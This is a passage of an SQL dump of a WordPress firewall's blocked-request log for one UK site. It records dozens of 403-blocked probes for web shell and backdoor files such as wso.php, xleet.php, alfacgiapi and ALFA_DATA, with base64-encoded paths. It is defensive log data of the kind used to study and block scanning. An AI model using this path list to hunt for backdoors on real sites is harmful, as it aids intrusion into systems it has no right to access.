User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11551,1674057776.760816,1674057776.633200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11552,1674057776.240444,1674057776.134600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11553,1674057775.743084,1674057775.628600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11554,1674057775.235806,1674057775.110500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11555,1674057774.707084,1674057774.562800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11556,1674057774.163733,1674057774.056200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11557,1674057773.664417,1674057773.555500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11558,1674057773.162566,1674057773.057100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11559,1674057772.121946,1674057772.008300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11560,1674057771.076385,1674057770.970200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11561,1674057770.043928,1674057769.876400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11562,1674057768.941716,1674057768.784100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11563,1674057767.839574,1674057767.669600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11564,1674057766.730713,1674057766.545700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11565,1674057765.611700,1674057765.479600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11566,1674057764.546579,1674057764.429500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11567,1674057763.496948,1674057763.387200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11568,1674057762.454498,1674057762.307700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11569,1674057761.373897,1674057761.268000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11570,1674057760.327964,1674057760.217200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11571,1674057759.286986,1674057759.177300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11572,1674057758.236989,1674057758.093800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11573,1674057757.027837,1674057756.854200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11574,1674057755.810865,1674057755.685000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11575,1674057754.742962,1674057754.619000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11576,1674057753.585109,1674057753.457900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11577,1674057752.466138,1674057752.353000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11578,1674057751.414475,1674057751.302900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11579,1674057750.375944,1674057750.230900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11580,1674057749.291910,1674057749.150500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11581,1674057748.217545,1674057748.112000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11582,1674057747.166848,1674057747.027100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11583,1674057746.088459,1674057745.945800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11584,1674057744.996848,1674057744.889100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11585,1674057743.961508,1674057743.853200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11586,1674057740.500271,1674057740.376600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11587,1674057739.437548,1674057739.294700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11588,1674057738.351180,1674057738.241200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11589,1674057736.922418,1674057736.812100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11590,1674057733.856712,1674057733.708300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11591,1674057732.726004,1674057732.617900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11592,1674057731.678151,1674057731.567500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11593,1674057729.199290,1674057729.088400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11594,1674057728.145329,1674057728.033300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11595,1674057727.636552,1674057727.485000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11596,1674057725.737339,1674057725.615300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11597,1674057724.678339,1674057724.568900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11598,1674057723.641849,1674057723.530600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11599,1674057717.358747,1674057717.223800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11600,1674057714.782794,1674057714.675500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11601,1674057713.719962,1674057713.538100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11602,1674057712.598998,1674057712.468200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11603,1674057709.502548,1674057709.347100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11604,1674057708.413352,1674057708.251100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 